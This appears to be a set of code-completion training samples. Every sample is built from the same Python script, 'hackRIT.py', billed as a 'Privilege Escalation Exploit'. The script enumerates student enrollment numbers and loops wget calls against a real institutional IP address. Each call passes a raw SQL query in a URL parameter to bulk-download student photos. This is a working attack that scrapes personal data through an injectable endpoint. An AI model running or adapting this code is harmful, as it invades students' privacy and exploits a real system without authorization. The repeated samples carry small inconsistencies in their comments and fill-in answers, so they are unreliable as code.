<|file_name|>hackRIT.py<|end_file_name|><|fim▁begin|>import os
#Decoration Starts
print """
+=============================================================+
|| Privilege Escalation Exploit ||
|| +===================================================+ ||
|| | _ _ _ ____ _ __ ____ ___ _____ | ||
|| | | | | | / \ / ___| |/ / | _ \|_ _|_ _| | ||
|| | | |_| | / _ \| | | ' / | |_) || | | | | ||
|| | | _ |/ ___ \ |___| . \ | _ < | | | | | ||
|| | |_| |_/_/ \_\____|_|\_\ |_| \_\___| |_| | ||
|| | | ||
|| +===================================================+ ||
|| ~ by Yadnyawalkya Tale ([email protected]) ~ ||
+=============================================================+
"""
#Decoration Ends
# Class according to Year Input
print "\n1. B.Tech Final Year\n2. T.Y.B.Tech\n3. S.Y.B.Tech\n4. F.Y.Tech"
year_input = input()
if year_input == 1:
year_choice = 1300000 #Final Year
elif year_input == 2:
year_choice = 1400000 #Third Year
elif year_input == 3:
year_choice = 1500000 #Second Year
elif year_input == 4:
year_choice = 1600000 #First Year
# Department Class Input
print "\n1.Automobile\n2.Civil\n3.ComputerScience\n4.InformationTechnology\n5.ETC\n6.Electrial\n7.Mech"
class_input = input()
if class_input == 1:
class_choice = 1000 #Automobile Department
elif class_input == 2:
<|fim_middle|>
elif class_input == 3:
class_choice = 3000 #ComputerScience Department
elif class_input == 4:
class_choice = 4000 #InformationTechnology Department
elif class_input == 5:
class_choice = 5000 #ETC Department
elif class_input == 6:
class_choice = 8000 #Electrial Department
elif class_input == 7:
class_choice = 6000 #Mechanical Department
startflag = year_choice + class_choice #For eg. Start @ 1303000
if class_input == 7:
endflag = year_choice + class_choice + 70 +128 #Special Arrangement for Mechanical ;)
else:
endflag = year_choice + class_choice + 70 #For eg. End @ 1303070
os.system("mkdir ritphotos")
decoration="="
while startflag < endflag:
startflag = startflag + 1
cmd1 = "wget http://210.212.171.168/ritcloud/StudentPhoto.ashx?ID=SELECT%20Photo%20FROM%20StudMstAll%20WHERE%20EnrollNo%20=%20%27{0}%27 -O ritphotos/photo_{1}.jpg 2>/dev/null ".format(startflag,startflag)
os.system(cmd1)
decoration = "=" + decoration
print "{0}".format(decoration)
print "100%\tPlease Wait..."
pstartflag = year_choice + class_choice + 150000
if class_input == 7:
pendflag = year_choice + class_choice + 40 + 150000 #For All branches
else:
pendflag = year_choice + class_choice + 15 + 150000 #Special Arrangement for Mechanical ;)
while pstartflag < pendflag:
pstartflag = pstartflag + 1
cmd2 = "wget http://210.212.171.168/ritcloud/StudentPhoto.ashx?ID=SELECT%20Photo%20FROM%20StudMstAll%20WHERE%20EnrollNo%20=%20%27{0}%27 -O ritphotos/photo_{1}.jpg 2>/dev/null ".format(pstartflag,pstartflag)
os.system(cmd2)
print "Downloading Images Complete..."
os.system("find ritphotos -size 0 -print0 |xargs -0 rm 2>/dev/null ") #Remove 0-Size Images
<|fim▁end|> | class_choice = 2000 #Civil Department |
<|file_name|>hackRIT.py<|end_file_name|><|fim▁begin|>import os
#Decoration Starts
print """
+=============================================================+
|| Privilege Escalation Exploit ||
|| +===================================================+ ||
|| | _ _ _ ____ _ __ ____ ___ _____ | ||
|| | | | | | / \ / ___| |/ / | _ \|_ _|_ _| | ||
|| | | |_| | / _ \| | | ' / | |_) || | | | | ||
|| | | _ |/ ___ \ |___| . \ | _ < | | | | | ||
|| | |_| |_/_/ \_\____|_|\_\ |_| \_\___| |_| | ||
|| | | ||
|| +===================================================+ ||
|| ~ by Yadnyawalkya Tale ([email protected]) ~ ||
+=============================================================+
"""
#Decoration Ends
# Class according to Year Input
print "\n1. B.Tech Final Year\n2. T.Y.B.Tech\n3. S.Y.B.Tech\n4. F.Y.Tech"
year_input = input()
if year_input == 1:
year_choice = 1300000 #Final Year
elif year_input == 2:
year_choice = 1400000 #Third Year
elif year_input == 3:
year_choice = 1500000 #Second Year
elif year_input == 4:
year_choice = 1600000 #First Year
# Department Class Input
print "\n1.Automobile\n2.Civil\n3.ComputerScience\n4.InformationTechnology\n5.ETC\n6.Electrial\n7.Mech"
class_input = input()
if class_input == 1:
class_choice = 1000 #Automobile Department
elif class_input == 2:
class_choice = 2000 #Civil Department
elif class_input == 3:
<|fim_middle|>
elif class_input == 4:
class_choice = 4000 #InformationTechnology Department
elif class_input == 5:
class_choice = 5000 #ETC Department
elif class_input == 6:
class_choice = 8000 #Electrial Department
elif class_input == 7:
class_choice = 6000 #Mechanical Department
startflag = year_choice + class_choice #For eg. Start @ 1303000
if class_input == 7:
endflag = year_choice + class_choice + 70 +128 #Special Arrangement for Mechanical ;)
else:
endflag = year_choice + class_choice + 70 #For eg. End @ 1303070
os.system("mkdir ritphotos")
decoration="="
while startflag < endflag:
startflag = startflag + 1
cmd1 = "wget http://210.212.171.168/ritcloud/StudentPhoto.ashx?ID=SELECT%20Photo%20FROM%20StudMstAll%20WHERE%20EnrollNo%20=%20%27{0}%27 -O ritphotos/photo_{1}.jpg 2>/dev/null ".format(startflag,startflag)
os.system(cmd1)
decoration = "=" + decoration
print "{0}".format(decoration)
print "100%\tPlease Wait..."
pstartflag = year_choice + class_choice + 150000
if class_input == 7:
pendflag = year_choice + class_choice + 40 + 150000 #For All branches
else:
pendflag = year_choice + class_choice + 15 + 150000 #Special Arrangement for Mechanical ;)
while pstartflag < pendflag:
pstartflag = pstartflag + 1
cmd2 = "wget http://210.212.171.168/ritcloud/StudentPhoto.ashx?ID=SELECT%20Photo%20FROM%20StudMstAll%20WHERE%20EnrollNo%20=%20%27{0}%27 -O ritphotos/photo_{1}.jpg 2>/dev/null ".format(pstartflag,pstartflag)
os.system(cmd2)
print "Downloading Images Complete..."
os.system("find ritphotos -size 0 -print0 |xargs -0 rm 2>/dev/null ") #Remove 0-Size Images
<|fim▁end|> | class_choice = 3000 #ComputerScience Department |
<|file_name|>hackRIT.py<|end_file_name|><|fim▁begin|>import os
#Decoration Starts
print """
+=============================================================+
|| Privilege Escalation Exploit ||
|| +===================================================+ ||
|| | _ _ _ ____ _ __ ____ ___ _____ | ||
|| | | | | | / \ / ___| |/ / | _ \|_ _|_ _| | ||
|| | | |_| | / _ \| | | ' / | |_) || | | | | ||
|| | | _ |/ ___ \ |___| . \ | _ < | | | | | ||
|| | |_| |_/_/ \_\____|_|\_\ |_| \_\___| |_| | ||
|| | | ||
|| +===================================================+ ||
|| ~ by Yadnyawalkya Tale ([email protected]) ~ ||
+=============================================================+
"""
#Decoration Ends
# Class according to Year Input
print "\n1. B.Tech Final Year\n2. T.Y.B.Tech\n3. S.Y.B.Tech\n4. F.Y.Tech"
year_input = input()
if year_input == 1:
year_choice = 1300000 #Final Year
elif year_input == 2:
year_choice = 1400000 #Third Year
elif year_input == 3:
year_choice = 1500000 #Second Year
elif year_input == 4:
year_choice = 1600000 #First Year
# Department Class Input
print "\n1.Automobile\n2.Civil\n3.ComputerScience\n4.InformationTechnology\n5.ETC\n6.Electrial\n7.Mech"
class_input = input()
if class_input == 1:
class_choice = 1000 #Automobile Department
elif class_input == 2:
class_choice = 2000 #Civil Department
elif class_input == 3:
class_choice = 3000 #ComputerScience Department
elif class_input == 4:
<|fim_middle|>
elif class_input == 5:
class_choice = 5000 #ETC Department
elif class_input == 6:
class_choice = 8000 #Electrial Department
elif class_input == 7:
class_choice = 6000 #Mechanical Department
startflag = year_choice + class_choice #For eg. Start @ 1303000
if class_input == 7:
endflag = year_choice + class_choice + 70 +128 #Special Arrangement for Mechanical ;)
else:
endflag = year_choice + class_choice + 70 #For eg. End @ 1303070
os.system("mkdir ritphotos")
decoration="="
while startflag < endflag:
startflag = startflag + 1
cmd1 = "wget http://210.212.171.168/ritcloud/StudentPhoto.ashx?ID=SELECT%20Photo%20FROM%20StudMstAll%20WHERE%20EnrollNo%20=%20%27{0}%27 -O ritphotos/photo_{1}.jpg 2>/dev/null ".format(startflag,startflag)
os.system(cmd1)
decoration = "=" + decoration
print "{0}".format(decoration)
print "100%\tPlease Wait..."
pstartflag = year_choice + class_choice + 150000
if class_input == 7:
pendflag = year_choice + class_choice + 40 + 150000 #For All branches
else:
pendflag = year_choice + class_choice + 15 + 150000 #Special Arrangement for Mechanical ;)
while pstartflag < pendflag:
pstartflag = pstartflag + 1
cmd2 = "wget http://210.212.171.168/ritcloud/StudentPhoto.ashx?ID=SELECT%20Photo%20FROM%20StudMstAll%20WHERE%20EnrollNo%20=%20%27{0}%27 -O ritphotos/photo_{1}.jpg 2>/dev/null ".format(pstartflag,pstartflag)
os.system(cmd2)
print "Downloading Images Complete..."
os.system("find ritphotos -size 0 -print0 |xargs -0 rm 2>/dev/null ") #Remove 0-Size Images
<|fim▁end|> | class_choice = 4000 #InformationTechnology Department |
<|file_name|>hackRIT.py<|end_file_name|><|fim▁begin|>import os
#Decoration Starts
print """
+=============================================================+
|| Privilege Escalation Exploit ||
|| +===================================================+ ||
|| | _ _ _ ____ _ __ ____ ___ _____ | ||
|| | | | | | / \ / ___| |/ / | _ \|_ _|_ _| | ||
|| | | |_| | / _ \| | | ' / | |_) || | | | | ||
|| | | _ |/ ___ \ |___| . \ | _ < | | | | | ||
|| | |_| |_/_/ \_\____|_|\_\ |_| \_\___| |_| | ||
|| | | ||
|| +===================================================+ ||
|| ~ by Yadnyawalkya Tale ([email protected]) ~ ||
+=============================================================+
"""
#Decoration Ends
# Class according to Year Input
print "\n1. B.Tech Final Year\n2. T.Y.B.Tech\n3. S.Y.B.Tech\n4. F.Y.Tech"
year_input = input()
if year_input == 1:
year_choice = 1300000 #Final Year
elif year_input == 2:
year_choice = 1400000 #Third Year
elif year_input == 3:
year_choice = 1500000 #Second Year
elif year_input == 4:
year_choice = 1600000 #First Year
# Department Class Input
print "\n1.Automobile\n2.Civil\n3.ComputerScience\n4.InformationTechnology\n5.ETC\n6.Electrial\n7.Mech"
class_input = input()
if class_input == 1:
class_choice = 1000 #Automobile Department
elif class_input == 2:
class_choice = 2000 #Civil Department
elif class_input == 3:
class_choice = 3000 #ComputerScience Department
elif class_input == 4:
class_choice = 4000 #InformationTechnology Department
elif class_input == 5:
<|fim_middle|>
elif class_input == 6:
class_choice = 8000 #Electrial Department
elif class_input == 7:
class_choice = 6000 #Mechanical Department
startflag = year_choice + class_choice #For eg. Start @ 1303000
if class_input == 7:
endflag = year_choice + class_choice + 70 +128 #Special Arrangement for Mechanical ;)
else:
endflag = year_choice + class_choice + 70 #For eg. End @ 1303070
os.system("mkdir ritphotos")
decoration="="
while startflag < endflag:
startflag = startflag + 1
cmd1 = "wget http://210.212.171.168/ritcloud/StudentPhoto.ashx?ID=SELECT%20Photo%20FROM%20StudMstAll%20WHERE%20EnrollNo%20=%20%27{0}%27 -O ritphotos/photo_{1}.jpg 2>/dev/null ".format(startflag,startflag)
os.system(cmd1)
decoration = "=" + decoration
print "{0}".format(decoration)
print "100%\tPlease Wait..."
pstartflag = year_choice + class_choice + 150000
if class_input == 7:
pendflag = year_choice + class_choice + 40 + 150000 #For All branches
else:
pendflag = year_choice + class_choice + 15 + 150000 #Special Arrangement for Mechanical ;)
while pstartflag < pendflag:
pstartflag = pstartflag + 1
cmd2 = "wget http://210.212.171.168/ritcloud/StudentPhoto.ashx?ID=SELECT%20Photo%20FROM%20StudMstAll%20WHERE%20EnrollNo%20=%20%27{0}%27 -O ritphotos/photo_{1}.jpg 2>/dev/null ".format(pstartflag,pstartflag)
os.system(cmd2)
print "Downloading Images Complete..."
os.system("find ritphotos -size 0 -print0 |xargs -0 rm 2>/dev/null ") #Remove 0-Size Images
<|fim▁end|> | class_choice = 5000 #ETC Department |
<|file_name|>hackRIT.py<|end_file_name|><|fim▁begin|>import os
#Decoration Starts
print """
+=============================================================+
|| Privilege Escalation Exploit ||
|| +===================================================+ ||
|| | _ _ _ ____ _ __ ____ ___ _____ | ||
|| | | | | | / \ / ___| |/ / | _ \|_ _|_ _| | ||
|| | | |_| | / _ \| | | ' / | |_) || | | | | ||
|| | | _ |/ ___ \ |___| . \ | _ < | | | | | ||
|| | |_| |_/_/ \_\____|_|\_\ |_| \_\___| |_| | ||
|| | | ||
|| +===================================================+ ||
|| ~ by Yadnyawalkya Tale ([email protected]) ~ ||
+=============================================================+
"""
#Decoration Ends
# Class according to Year Input
print "\n1. B.Tech Final Year\n2. T.Y.B.Tech\n3. S.Y.B.Tech\n4. F.Y.Tech"
year_input = input()
if year_input == 1:
year_choice = 1300000 #Final Year
elif year_input == 2:
year_choice = 1400000 #Third Year
elif year_input == 3:
year_choice = 1500000 #Second Year
elif year_input == 4:
year_choice = 1600000 #First Year
# Department Class Input
print "\n1.Automobile\n2.Civil\n3.ComputerScience\n4.InformationTechnology\n5.ETC\n6.Electrial\n7.Mech"
class_input = input()
if class_input == 1:
class_choice = 1000 #Automobile Department
elif class_input == 2:
class_choice = 2000 #Civil Department
elif class_input == 3:
class_choice = 3000 #ComputerScience Department
elif class_input == 4:
class_choice = 4000 #InformationTechnology Department
elif class_input == 5:
class_choice = 5000 #ETC Department
elif class_input == 6:
<|fim_middle|>
elif class_input == 7:
class_choice = 6000 #Mechanical Department
startflag = year_choice + class_choice #For eg. Start @ 1303000
if class_input == 7:
endflag = year_choice + class_choice + 70 +128 #Special Arrangement for Mechanical ;)
else:
endflag = year_choice + class_choice + 70 #For eg. End @ 1303070
os.system("mkdir ritphotos")
decoration="="
while startflag < endflag:
startflag = startflag + 1
cmd1 = "wget http://210.212.171.168/ritcloud/StudentPhoto.ashx?ID=SELECT%20Photo%20FROM%20StudMstAll%20WHERE%20EnrollNo%20=%20%27{0}%27 -O ritphotos/photo_{1}.jpg 2>/dev/null ".format(startflag,startflag)
os.system(cmd1)
decoration = "=" + decoration
print "{0}".format(decoration)
print "100%\tPlease Wait..."
pstartflag = year_choice + class_choice + 150000
if class_input == 7:
	pendflag = year_choice + class_choice + 40 + 150000 	#Special Arrangement for Mechanical ;)
else:
	pendflag = year_choice + class_choice + 15 + 150000	#For All branches
while pstartflag < pendflag:
pstartflag = pstartflag + 1
cmd2 = "wget http://210.212.171.168/ritcloud/StudentPhoto.ashx?ID=SELECT%20Photo%20FROM%20StudMstAll%20WHERE%20EnrollNo%20=%20%27{0}%27 -O ritphotos/photo_{1}.jpg 2>/dev/null ".format(pstartflag,pstartflag)
os.system(cmd2)
print "Downloading Images Complete..."
os.system("find ritphotos -size 0 -print0 |xargs -0 rm 2>/dev/null ") #Remove 0-Size Images
<|fim▁end|> | class_choice = 8000 #Electrial Department |
<|file_name|>hackRIT.py<|end_file_name|><|fim▁begin|>import os
#Decoration Starts
print """
+=============================================================+
|| Privilege Escalation Exploit ||
|| +===================================================+ ||
|| | _ _ _ ____ _ __ ____ ___ _____ | ||
|| | | | | | / \ / ___| |/ / | _ \|_ _|_ _| | ||
|| | | |_| | / _ \| | | ' / | |_) || | | | | ||
|| | | _ |/ ___ \ |___| . \ | _ < | | | | | ||
|| | |_| |_/_/ \_\____|_|\_\ |_| \_\___| |_| | ||
|| | | ||
|| +===================================================+ ||
|| ~ by Yadnyawalkya Tale ([email protected]) ~ ||
+=============================================================+
"""
#Decoration Ends
# Class according to Year Input
print "\n1. B.Tech Final Year\n2. T.Y.B.Tech\n3. S.Y.B.Tech\n4. F.Y.Tech"
year_input = input()
if year_input == 1:
year_choice = 1300000 #Final Year
elif year_input == 2:
year_choice = 1400000 #Third Year
elif year_input == 3:
year_choice = 1500000 #Second Year
elif year_input == 4:
year_choice = 1600000 #First Year
# Department Class Input
print "\n1.Automobile\n2.Civil\n3.ComputerScience\n4.InformationTechnology\n5.ETC\n6.Electrial\n7.Mech"
class_input = input()
if class_input == 1:
class_choice = 1000 #Automobile Department
elif class_input == 2:
class_choice = 2000 #Civil Department
elif class_input == 3:
class_choice = 3000 #ComputerScience Department
elif class_input == 4:
class_choice = 4000 #InformationTechnology Department
elif class_input == 5:
class_choice = 5000 #ETC Department
elif class_input == 6:
	class_choice = 8000 #Electrical Department
elif class_input == 7:
<|fim_middle|>
startflag = year_choice + class_choice #For eg. Start @ 1303000
if class_input == 7:
endflag = year_choice + class_choice + 70 +128 #Special Arrangement for Mechanical ;)
else:
endflag = year_choice + class_choice + 70 #For eg. End @ 1303070
os.system("mkdir ritphotos")
decoration="="
while startflag < endflag:
startflag = startflag + 1
cmd1 = "wget http://210.212.171.168/ritcloud/StudentPhoto.ashx?ID=SELECT%20Photo%20FROM%20StudMstAll%20WHERE%20EnrollNo%20=%20%27{0}%27 -O ritphotos/photo_{1}.jpg 2>/dev/null ".format(startflag,startflag)
os.system(cmd1)
decoration = "=" + decoration
print "{0}".format(decoration)
print "100%\tPlease Wait..."
pstartflag = year_choice + class_choice + 150000
if class_input == 7:
	pendflag = year_choice + class_choice + 40 + 150000 	#Special Arrangement for Mechanical ;)
else:
	pendflag = year_choice + class_choice + 15 + 150000	#For All branches
while pstartflag < pendflag:
pstartflag = pstartflag + 1
cmd2 = "wget http://210.212.171.168/ritcloud/StudentPhoto.ashx?ID=SELECT%20Photo%20FROM%20StudMstAll%20WHERE%20EnrollNo%20=%20%27{0}%27 -O ritphotos/photo_{1}.jpg 2>/dev/null ".format(pstartflag,pstartflag)
os.system(cmd2)
print "Downloading Images Complete..."
os.system("find ritphotos -size 0 -print0 |xargs -0 rm 2>/dev/null ") #Remove 0-Size Images
<|fim▁end|> | class_choice = 6000 #Mechanical Department |
<|file_name|>hackRIT.py<|end_file_name|><|fim▁begin|>import os
#Decoration Starts
print """
+=============================================================+
|| Privilege Escalation Exploit ||
|| +===================================================+ ||
|| | _ _ _ ____ _ __ ____ ___ _____ | ||
|| | | | | | / \ / ___| |/ / | _ \|_ _|_ _| | ||
|| | | |_| | / _ \| | | ' / | |_) || | | | | ||
|| | | _ |/ ___ \ |___| . \ | _ < | | | | | ||
|| | |_| |_/_/ \_\____|_|\_\ |_| \_\___| |_| | ||
|| | | ||
|| +===================================================+ ||
|| ~ by Yadnyawalkya Tale ([email protected]) ~ ||
+=============================================================+
"""
#Decoration Ends
# Class according to Year Input
print "\n1. B.Tech Final Year\n2. T.Y.B.Tech\n3. S.Y.B.Tech\n4. F.Y.Tech"
year_input = input()
if year_input == 1:
year_choice = 1300000 #Final Year
elif year_input == 2:
year_choice = 1400000 #Third Year
elif year_input == 3:
year_choice = 1500000 #Second Year
elif year_input == 4:
year_choice = 1600000 #First Year
# Department Class Input
print "\n1.Automobile\n2.Civil\n3.ComputerScience\n4.InformationTechnology\n5.ETC\n6.Electrial\n7.Mech"
class_input = input()
if class_input == 1:
class_choice = 1000 #Automobile Department
elif class_input == 2:
class_choice = 2000 #Civil Department
elif class_input == 3:
class_choice = 3000 #ComputerScience Department
elif class_input == 4:
class_choice = 4000 #InformationTechnology Department
elif class_input == 5:
class_choice = 5000 #ETC Department
elif class_input == 6:
	class_choice = 8000 #Electrical Department
elif class_input == 7:
class_choice = 6000 #Mechanical Department
startflag = year_choice + class_choice #For eg. Start @ 1303000
if class_input == 7:
<|fim_middle|>
else:
endflag = year_choice + class_choice + 70 #For eg. End @ 1303070
os.system("mkdir ritphotos")
decoration="="
while startflag < endflag:
startflag = startflag + 1
cmd1 = "wget http://210.212.171.168/ritcloud/StudentPhoto.ashx?ID=SELECT%20Photo%20FROM%20StudMstAll%20WHERE%20EnrollNo%20=%20%27{0}%27 -O ritphotos/photo_{1}.jpg 2>/dev/null ".format(startflag,startflag)
os.system(cmd1)
decoration = "=" + decoration
print "{0}".format(decoration)
print "100%\tPlease Wait..."
pstartflag = year_choice + class_choice + 150000
if class_input == 7:
	pendflag = year_choice + class_choice + 40 + 150000 	#Special Arrangement for Mechanical ;)
else:
	pendflag = year_choice + class_choice + 15 + 150000	#For All branches
while pstartflag < pendflag:
pstartflag = pstartflag + 1
cmd2 = "wget http://210.212.171.168/ritcloud/StudentPhoto.ashx?ID=SELECT%20Photo%20FROM%20StudMstAll%20WHERE%20EnrollNo%20=%20%27{0}%27 -O ritphotos/photo_{1}.jpg 2>/dev/null ".format(pstartflag,pstartflag)
os.system(cmd2)
print "Downloading Images Complete..."
os.system("find ritphotos -size 0 -print0 |xargs -0 rm 2>/dev/null ") #Remove 0-Size Images
<|fim▁end|> | endflag = year_choice + class_choice + 70 +128 #Special Arrangement for Mechanical ;) |
<|file_name|>hackRIT.py<|end_file_name|><|fim▁begin|>import os
#Decoration Starts
print """
+=============================================================+
|| Privilege Escalation Exploit ||
|| +===================================================+ ||
|| | _ _ _ ____ _ __ ____ ___ _____ | ||
|| | | | | | / \ / ___| |/ / | _ \|_ _|_ _| | ||
|| | | |_| | / _ \| | | ' / | |_) || | | | | ||
|| | | _ |/ ___ \ |___| . \ | _ < | | | | | ||
|| | |_| |_/_/ \_\____|_|\_\ |_| \_\___| |_| | ||
|| | | ||
|| +===================================================+ ||
|| ~ by Yadnyawalkya Tale ([email protected]) ~ ||
+=============================================================+
"""
#Decoration Ends
# Class according to Year Input
print "\n1. B.Tech Final Year\n2. T.Y.B.Tech\n3. S.Y.B.Tech\n4. F.Y.Tech"
year_input = input()
if year_input == 1:
year_choice = 1300000 #Final Year
elif year_input == 2:
year_choice = 1400000 #Third Year
elif year_input == 3:
year_choice = 1500000 #Second Year
elif year_input == 4:
year_choice = 1600000 #First Year
# Department Class Input
print "\n1.Automobile\n2.Civil\n3.ComputerScience\n4.InformationTechnology\n5.ETC\n6.Electrial\n7.Mech"
class_input = input()
if class_input == 1:
class_choice = 1000 #Automobile Department
elif class_input == 2:
class_choice = 2000 #Civil Department
elif class_input == 3:
class_choice = 3000 #ComputerScience Department
elif class_input == 4:
class_choice = 4000 #InformationTechnology Department
elif class_input == 5:
class_choice = 5000 #ETC Department
elif class_input == 6:
	class_choice = 8000 #Electrical Department
elif class_input == 7:
class_choice = 6000 #Mechanical Department
startflag = year_choice + class_choice #For eg. Start @ 1303000
if class_input == 7:
endflag = year_choice + class_choice + 70 +128 #Special Arrangement for Mechanical ;)
else:
<|fim_middle|>
os.system("mkdir ritphotos")
decoration="="
while startflag < endflag:
startflag = startflag + 1
cmd1 = "wget http://210.212.171.168/ritcloud/StudentPhoto.ashx?ID=SELECT%20Photo%20FROM%20StudMstAll%20WHERE%20EnrollNo%20=%20%27{0}%27 -O ritphotos/photo_{1}.jpg 2>/dev/null ".format(startflag,startflag)
os.system(cmd1)
decoration = "=" + decoration
print "{0}".format(decoration)
print "100%\tPlease Wait..."
pstartflag = year_choice + class_choice + 150000
if class_input == 7:
	pendflag = year_choice + class_choice + 40 + 150000 	#Special Arrangement for Mechanical ;)
else:
	pendflag = year_choice + class_choice + 15 + 150000	#For All branches
while pstartflag < pendflag:
pstartflag = pstartflag + 1
cmd2 = "wget http://210.212.171.168/ritcloud/StudentPhoto.ashx?ID=SELECT%20Photo%20FROM%20StudMstAll%20WHERE%20EnrollNo%20=%20%27{0}%27 -O ritphotos/photo_{1}.jpg 2>/dev/null ".format(pstartflag,pstartflag)
os.system(cmd2)
print "Downloading Images Complete..."
os.system("find ritphotos -size 0 -print0 |xargs -0 rm 2>/dev/null ") #Remove 0-Size Images
<|fim▁end|> | endflag = year_choice + class_choice + 70 #For eg. End @ 1303070 |
<|file_name|>hackRIT.py<|end_file_name|><|fim▁begin|>import os
#Decoration Starts
print """
+=============================================================+
|| Privilege Escalation Exploit ||
|| +===================================================+ ||
|| | _ _ _ ____ _ __ ____ ___ _____ | ||
|| | | | | | / \ / ___| |/ / | _ \|_ _|_ _| | ||
|| | | |_| | / _ \| | | ' / | |_) || | | | | ||
|| | | _ |/ ___ \ |___| . \ | _ < | | | | | ||
|| | |_| |_/_/ \_\____|_|\_\ |_| \_\___| |_| | ||
|| | | ||
|| +===================================================+ ||
|| ~ by Yadnyawalkya Tale ([email protected]) ~ ||
+=============================================================+
"""
#Decoration Ends
# Class according to Year Input
print "\n1. B.Tech Final Year\n2. T.Y.B.Tech\n3. S.Y.B.Tech\n4. F.Y.Tech"
year_input = input()
if year_input == 1:
year_choice = 1300000 #Final Year
elif year_input == 2:
year_choice = 1400000 #Third Year
elif year_input == 3:
year_choice = 1500000 #Second Year
elif year_input == 4:
year_choice = 1600000 #First Year
# Department Class Input
print "\n1.Automobile\n2.Civil\n3.ComputerScience\n4.InformationTechnology\n5.ETC\n6.Electrial\n7.Mech"
class_input = input()
if class_input == 1:
class_choice = 1000 #Automobile Department
elif class_input == 2:
class_choice = 2000 #Civil Department
elif class_input == 3:
class_choice = 3000 #ComputerScience Department
elif class_input == 4:
class_choice = 4000 #InformationTechnology Department
elif class_input == 5:
class_choice = 5000 #ETC Department
elif class_input == 6:
	class_choice = 8000 #Electrical Department
elif class_input == 7:
class_choice = 6000 #Mechanical Department
startflag = year_choice + class_choice #For eg. Start @ 1303000
if class_input == 7:
endflag = year_choice + class_choice + 70 +128 #Special Arrangement for Mechanical ;)
else:
endflag = year_choice + class_choice + 70 #For eg. End @ 1303070
os.system("mkdir ritphotos")
decoration="="
while startflag < endflag:
startflag = startflag + 1
cmd1 = "wget http://210.212.171.168/ritcloud/StudentPhoto.ashx?ID=SELECT%20Photo%20FROM%20StudMstAll%20WHERE%20EnrollNo%20=%20%27{0}%27 -O ritphotos/photo_{1}.jpg 2>/dev/null ".format(startflag,startflag)
os.system(cmd1)
decoration = "=" + decoration
print "{0}".format(decoration)
print "100%\tPlease Wait..."
pstartflag = year_choice + class_choice + 150000
if class_input == 7:
<|fim_middle|>
else:
	pendflag = year_choice + class_choice + 15 + 150000	#For All branches
while pstartflag < pendflag:
pstartflag = pstartflag + 1
cmd2 = "wget http://210.212.171.168/ritcloud/StudentPhoto.ashx?ID=SELECT%20Photo%20FROM%20StudMstAll%20WHERE%20EnrollNo%20=%20%27{0}%27 -O ritphotos/photo_{1}.jpg 2>/dev/null ".format(pstartflag,pstartflag)
os.system(cmd2)
print "Downloading Images Complete..."
os.system("find ritphotos -size 0 -print0 |xargs -0 rm 2>/dev/null ") #Remove 0-Size Images
<|fim▁end|> | pendflag = year_choice + class_choice + 40 + 150000 #For All branches |
<|file_name|>hackRIT.py<|end_file_name|><|fim▁begin|>import os
#Decoration Starts
print """
+=============================================================+
|| Privilege Escalation Exploit ||
|| +===================================================+ ||
|| | _ _ _ ____ _ __ ____ ___ _____ | ||
|| | | | | | / \ / ___| |/ / | _ \|_ _|_ _| | ||
|| | | |_| | / _ \| | | ' / | |_) || | | | | ||
|| | | _ |/ ___ \ |___| . \ | _ < | | | | | ||
|| | |_| |_/_/ \_\____|_|\_\ |_| \_\___| |_| | ||
|| | | ||
|| +===================================================+ ||
|| ~ by Yadnyawalkya Tale ([email protected]) ~ ||
+=============================================================+
"""
#Decoration Ends
# Class according to Year Input
print "\n1. B.Tech Final Year\n2. T.Y.B.Tech\n3. S.Y.B.Tech\n4. F.Y.Tech"
year_input = input()
if year_input == 1:
year_choice = 1300000 #Final Year
elif year_input == 2:
year_choice = 1400000 #Third Year
elif year_input == 3:
year_choice = 1500000 #Second Year
elif year_input == 4:
year_choice = 1600000 #First Year
# Department Class Input
print "\n1.Automobile\n2.Civil\n3.ComputerScience\n4.InformationTechnology\n5.ETC\n6.Electrial\n7.Mech"
class_input = input()
if class_input == 1:
class_choice = 1000 #Automobile Department
elif class_input == 2:
class_choice = 2000 #Civil Department
elif class_input == 3:
class_choice = 3000 #ComputerScience Department
elif class_input == 4:
class_choice = 4000 #InformationTechnology Department
elif class_input == 5:
class_choice = 5000 #ETC Department
elif class_input == 6:
	class_choice = 8000 #Electrical Department
elif class_input == 7:
class_choice = 6000 #Mechanical Department
startflag = year_choice + class_choice #For eg. Start @ 1303000
if class_input == 7:
endflag = year_choice + class_choice + 70 +128 #Special Arrangement for Mechanical ;)
else:
endflag = year_choice + class_choice + 70 #For eg. End @ 1303070
os.system("mkdir ritphotos")
decoration="="
while startflag < endflag:
startflag = startflag + 1
cmd1 = "wget http://210.212.171.168/ritcloud/StudentPhoto.ashx?ID=SELECT%20Photo%20FROM%20StudMstAll%20WHERE%20EnrollNo%20=%20%27{0}%27 -O ritphotos/photo_{1}.jpg 2>/dev/null ".format(startflag,startflag)
os.system(cmd1)
decoration = "=" + decoration
print "{0}".format(decoration)
print "100%\tPlease Wait..."
pstartflag = year_choice + class_choice + 150000
if class_input == 7:
	pendflag = year_choice + class_choice + 40 + 150000 	#Special Arrangement for Mechanical ;)
else:
<|fim_middle|>
while pstartflag < pendflag:
pstartflag = pstartflag + 1
cmd2 = "wget http://210.212.171.168/ritcloud/StudentPhoto.ashx?ID=SELECT%20Photo%20FROM%20StudMstAll%20WHERE%20EnrollNo%20=%20%27{0}%27 -O ritphotos/photo_{1}.jpg 2>/dev/null ".format(pstartflag,pstartflag)
os.system(cmd2)
print "Downloading Images Complete..."
os.system("find ritphotos -size 0 -print0 |xargs -0 rm 2>/dev/null ") #Remove 0-Size Images
<|fim▁end|> | pendflag = year_choice + class_choice + 15 + 150000 #Special Arrangement for Mechanical ;) |